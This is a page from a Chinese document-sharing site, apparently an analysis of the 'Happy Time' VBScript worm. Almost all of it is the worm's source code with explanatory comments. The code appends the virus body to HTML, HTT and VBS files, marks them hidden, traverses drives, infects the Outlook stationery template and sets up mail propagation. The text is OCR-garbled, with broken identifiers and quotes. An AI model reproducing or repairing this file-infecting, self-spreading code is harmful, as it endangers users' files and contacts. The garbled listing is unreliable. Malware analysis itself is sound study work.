资源描述:
《欢乐时光源码分析》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、DimInWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsSheH,WinPath,SubE,FinalyDiskSubKJ_start()r初始化变量KJSetDim()'初始化环境KJCreateMilieu()'感染本地或者共亨上与html所在目录KJLikeltO1通过vbs感染Outlook邮件模板KJCreateMail()'进行病毒传播KJPropagate()EndSub'函数:KJAppendTo(FilePath,TypeStr)'功能:向指定类世的指定文件追加病毒'参数:1Fil
2、ePath指定文件路径1TypeStr指定类型FunctionKJAppendTo(FilePath,TypeStr)OnErrorResumeNext'以只读方式打开指定文件SetReadTemp=FSO.OpenTextFile(FilePath,1)1将文件内容读入到TmpStr变量中TmpStr=ReadTemp.ReadAll'判断文件中是否存在HKJ_start()H字符串,若存在说明已经感染,退出函数;'若文件长度小于1,也退出函数。IfInstr(TmpStr,,'KJ_start()n)<>0OrLen(TmpStr)<1ThenRead
3、Temp.CloseExitFunctionEndIf'如果传过来的类型是”htt“'在文件头加上调用页面的时候加载KJ_start()函数;1在文件尾追加html版本的加密病毒体。'如果是“himl”'在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;'如果是”vbs"1在文件尾追加vbs版本的病毒体IfTypeStr="htt"ThenReadTemp.CloseSetFileTemp=FSO.OpenTextFile(FilePath,2)FileTemp.Write“v”&”BODY&nvbscript:u&MKJ_st
4、art()“”“&”>“&vbCrLf&TmpStr&vbCrLf&HtmlTextFileTemp.CloseSetFAttrib=FSO.GetFile(FilePath)FAttrib.attributes=34ElseReadTemp.CloseSetFileTemp=FSO.OpenTextFile(FilePath,8)IfTypeStr="html"ThenHvbscript:H&FileTemp.WritevbCrLf&“v”&”HTML〉”&vbCrLf&”&“BODY'•KJ.startO”“”&&vbCrLf&HtmlTextElse
5、IfTypeStr=MvbsHThenFileTemp.WritevbCrLf&VbsTextEndIfFileTemp.CloseEndIfEndFunction'函数:KJChangeSub(CurrentString,LastlndexChar)'功能:改变子目录以及盘符'参数:'Currentstring当前目录'LastlndexChar上一级目录在当前路径屮的位置FunctionKJChangeSub(CuiTentString,LastlndexChar)'判断是否是根目录IfLastlndexChar=0Then'如果是根目录'如果是C:
6、,返回FinalyDisk盘,并将SubE置为0,'如果不是C:,返冋将当前盘符递减1,并将SubE置为0IfLeft(LCase(CurrentString),1)=7、on,函数:KJCreateMail()'功能:感染邮件部分FunctionKJCreateMail()OnErrorResumeNext1如果当前执行文件是”h(ml”的,就退出函数IfInWhere="htrnr*ThenExitFunctionEndIf1取系统盘的空白页的路径ShareFile=Left(WinPath?3)&"ProgramFilesCommonFilesMicrosoftSharedStationeryblank.htmH1如果存在这个文件,就向其追加html的病毒体1否则生成含有病毒体的这个文件If(FSO.FileE
8、xists(ShareFile))ThenCallKJAppend